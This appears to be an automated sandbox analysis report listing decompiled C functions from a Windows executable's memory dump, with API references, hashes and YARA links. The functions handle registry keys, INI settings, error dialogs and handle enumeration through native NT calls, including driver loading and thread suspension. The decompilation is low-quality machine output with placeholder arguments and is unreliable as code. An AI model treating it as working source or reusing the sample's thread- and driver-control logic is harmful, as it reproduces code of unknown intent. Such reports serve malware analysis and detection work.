                                                                                                                    • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                    • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                    • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                    0x00404683
                                                                                                                    0x00404692
                                                                                                                    0x00404699
                                                                                                                    0x0040469b
                                                                                                                    0x004046af
                                                                                                                    0x004046ba
                                                                                                                    0x004046bc
                                                                                                                    0x004046c7
                                                                                                                    0x004046cc
                                                                                                                    0x004046cd
                                                                                                                    0x004046ee
                                                                                                                    0x004046f3
                                                                                                                    0x004046fa
                                                                                                                    0x004046fa
                                                                                                                    0x004046ee
                                                                                                                    0x00404705

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004046AF
                                                                                                                    • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpen_snwprintfmemset
                                                                                                                    • String ID: %s\shell\%s
                                                                                                                    • API String ID: 1458959524-3196117466
                                                                                                                    • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                    • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                    • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                    • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 16%
                                                                                                                    			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                                    0x00409d5f
                                                                                                                    0x00409d67
                                                                                                                    0x00409d70
                                                                                                                    0x00409ddb
                                                                                                                    0x00409d72
                                                                                                                    0x00409d74
                                                                                                                    0x00409db2
                                                                                                                    0x00409d84
                                                                                                                    0x00409d84
                                                                                                                    0x00409d8c
                                                                                                                    0x00409d8d
                                                                                                                    0x00409d98
                                                                                                                    0x00409d9d
                                                                                                                    0x00409d9e
                                                                                                                    0x00409da6
                                                                                                                    0x00409daf
                                                                                                                    0x00409daf
                                                                                                                    0x00409dc3
                                                                                                                    0x00409dc3

                                                                                                                    APIs
                                                                                                                    • wcschr.MSVCRT ref: 00409D79
                                                                                                                    • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                    • String ID: "%s"
                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                    • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                    • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                    • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                    • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 38%
                                                                                                                    			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                    0x004047d2
                                                                                                                    0x004047da
                                                                                                                    0x004047e0
                                                                                                                    0x004047e4
                                                                                                                    0x004047ec
                                                                                                                    0x004047ec
                                                                                                                    0x004047f5
                                                                                                                    0x00404800
                                                                                                                    0x00404801
                                                                                                                    0x00404802
                                                                                                                    0x0040480d
                                                                                                                    0x00404812
                                                                                                                    0x00404813
                                                                                                                    0x00404834

                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                    • _snwprintf.MSVCRT ref: 00404813
                                                                                                                    • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                    • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                    • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                    • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                    • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                                    0x004068ec
                                                                                                                    0x004068f0
                                                                                                                    0x004068f4
                                                                                                                    0x004068ff
                                                                                                                    0x00406902
                                                                                                                    0x0040690a
                                                                                                                    0x00406910
                                                                                                                    0x00406911
                                                                                                                    0x0040691b
                                                                                                                    0x0040691e
                                                                                                                    0x00406923
                                                                                                                    0x0040692d
                                                                                                                    0x0040692e
                                                                                                                    0x00406933
                                                                                                                    0x0040693d
                                                                                                                    0x00406940
                                                                                                                    0x00406949
                                                                                                                    0x0040694a
                                                                                                                    0x00406950
                                                                                                                    0x00406956
                                                                                                                    0x00406959
                                                                                                                    0x0040695c
                                                                                                                    0x00406964
                                                                                                                    0x0040696d
                                                                                                                    0x00406974
                                                                                                                    0x0040697e
                                                                                                                    0x00406989
                                                                                                                    0x00406990
                                                                                                                    0x00406998
                                                                                                                    0x0040699b
                                                                                                                    0x0040699f
                                                                                                                    0x004069b8
                                                                                                                    0x004069bc
                                                                                                                    0x004069c4
                                                                                                                    0x004069c7
                                                                                                                    0x004069c7
                                                                                                                    0x004069cb
                                                                                                                    0x004069ce
                                                                                                                    0x004069d4
                                                                                                                    0x004069d4
                                                                                                                    0x004069d9
                                                                                                                    0x004069df
                                                                                                                    0x004069e6
                                                                                                                    0x004069ea
                                                                                                                    0x004069ef
                                                                                                                    0x004069f2
                                                                                                                    0x004069f5
                                                                                                                    0x00406a00
                                                                                                                    0x00406a01
                                                                                                                    0x00406a06
                                                                                                                    0x00406a08
                                                                                                                    0x00406a0b
                                                                                                                    0x00406a10
                                                                                                                    0x00406a16
                                                                                                                    0x00406a25
                                                                                                                    0x00406a25
                                                                                                                    0x00406a18
                                                                                                                    0x00406a1e
                                                                                                                    0x00406a1e
                                                                                                                    0x00406a27
                                                                                                                    0x00406a2f
                                                                                                                    0x00406a32
                                                                                                                    0x00406a35
                                                                                                                    0x00406a3b
                                                                                                                    0x00406a41
                                                                                                                    0x00406a47
                                                                                                                    0x00406a4d
                                                                                                                    0x00406a53
                                                                                                                    0x00406a5d
                                                                                                                    0x00406a6d

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                    • memcpy.MSVCRT ref: 0040696D
                                                                                                                    • memcpy.MSVCRT ref: 0040697E
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                      • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                      • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                      • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                      • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 975042529-0
                                                                                                                    • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                    • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                    • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                    • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                                    0x004097b1
                                                                                                                    0x004097b9
                                                                                                                    0x004097bb
                                                                                                                    0x004097be
                                                                                                                    0x004097c3
                                                                                                                    0x004097ca
                                                                                                                    0x004097de
                                                                                                                    0x004097de
                                                                                                                    0x004097e3
                                                                                                                    0x004097e5
                                                                                                                    0x004097e5
                                                                                                                    0x004097ec
                                                                                                                    0x004097f3
                                                                                                                    0x004097f6
                                                                                                                    0x004097fe
                                                                                                                    0x00409802
                                                                                                                    0x00409805
                                                                                                                    0x0040980a
                                                                                                                    0x0040980d
                                                                                                                    0x00409810
                                                                                                                    0x00409822
                                                                                                                    0x00000000
                                                                                                                    0x00409827
                                                                                                                    0x0040982a
                                                                                                                    0x004098da
                                                                                                                    0x004098da
                                                                                                                    0x004098dc
                                                                                                                    0x004098e0
                                                                                                                    0x004098e9
                                                                                                                    0x004098ec
                                                                                                                    0x004098f6
                                                                                                                    0x004098f6
                                                                                                                    0x004098e2
                                                                                                                    0x00000000
                                                                                                                    0x004098e2
                                                                                                                    0x00409830
                                                                                                                    0x00409833
                                                                                                                    0x00409838
                                                                                                                    0x0040983b
                                                                                                                    0x0040983e
                                                                                                                    0x0040985f
                                                                                                                    0x0040985f
                                                                                                                    0x00409861
                                                                                                                    0x00409863
                                                                                                                    0x0040989e
                                                                                                                    0x004098b1
                                                                                                                    0x004098b8
                                                                                                                    0x004098c0
                                                                                                                    0x004098c5
                                                                                                                    0x004098d5
                                                                                                                    0x00409865
                                                                                                                    0x00409865
                                                                                                                    0x00409865
                                                                                                                    0x0040986c
                                                                                                                    0x00409878
                                                                                                                    0x0040987f
                                                                                                                    0x0040988a
                                                                                                                    0x0040988f
                                                                                                                    0x0040988f
                                                                                                                    0x0040986c
                                                                                                                    0x00000000
                                                                                                                    0x00409863
                                                                                                                    0x00409840
                                                                                                                    0x00409843
                                                                                                                    0x00409846
                                                                                                                    0x0040984b
                                                                                                                    0x00409852
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409854
                                                                                                                    0x0040985d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040985d
                                                                                                                    0x00409894
                                                                                                                    0x00000000
                                                                                                                    0x00409894

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                      • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                    • memset.MSVCRT ref: 00409805
                                                                                                                    • memcpy.MSVCRT ref: 0040988A
                                                                                                                    • memcpy.MSVCRT ref: 004098C0
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3641025914-0
                                                                                                                    • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                    • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                    • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                    • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 68%
                                                                                                                    			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                                    0x004067ac
                                                                                                                    0x004067af
                                                                                                                    0x004067b5
                                                                                                                    0x004067ba
                                                                                                                    0x004067bf
                                                                                                                    0x004067c1
                                                                                                                    0x004067c6
                                                                                                                    0x004067c7
                                                                                                                    0x004067cc
                                                                                                                    0x004067cd
                                                                                                                    0x004067d2
                                                                                                                    0x004067d4
                                                                                                                    0x004067d9
                                                                                                                    0x004067da
                                                                                                                    0x004067df
                                                                                                                    0x004067e0
                                                                                                                    0x004067e5
                                                                                                                    0x004067e7
                                                                                                                    0x004067ec
                                                                                                                    0x004067ed
                                                                                                                    0x004067f2
                                                                                                                    0x004067f3
                                                                                                                    0x004067f8
                                                                                                                    0x004067fa
                                                                                                                    0x004067ff
                                                                                                                    0x00406800
                                                                                                                    0x00406805
                                                                                                                    0x00406806
                                                                                                                    0x00406808
                                                                                                                    0x0040680f
                                                                                                                    0x00406810
                                                                                                                    0x00406812
                                                                                                                    0x00406817
                                                                                                                    0x0040681e
                                                                                                                    0x00406828
                                                                                                                    0x0040682b
                                                                                                                    0x0040682c
                                                                                                                    0x0040681e
                                                                                                                    0x00406835
                                                                                                                    0x00406839
                                                                                                                    0x00406841

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                      • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                    • free.MSVCRT(00000000), ref: 00406839
                                                                                                                      • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
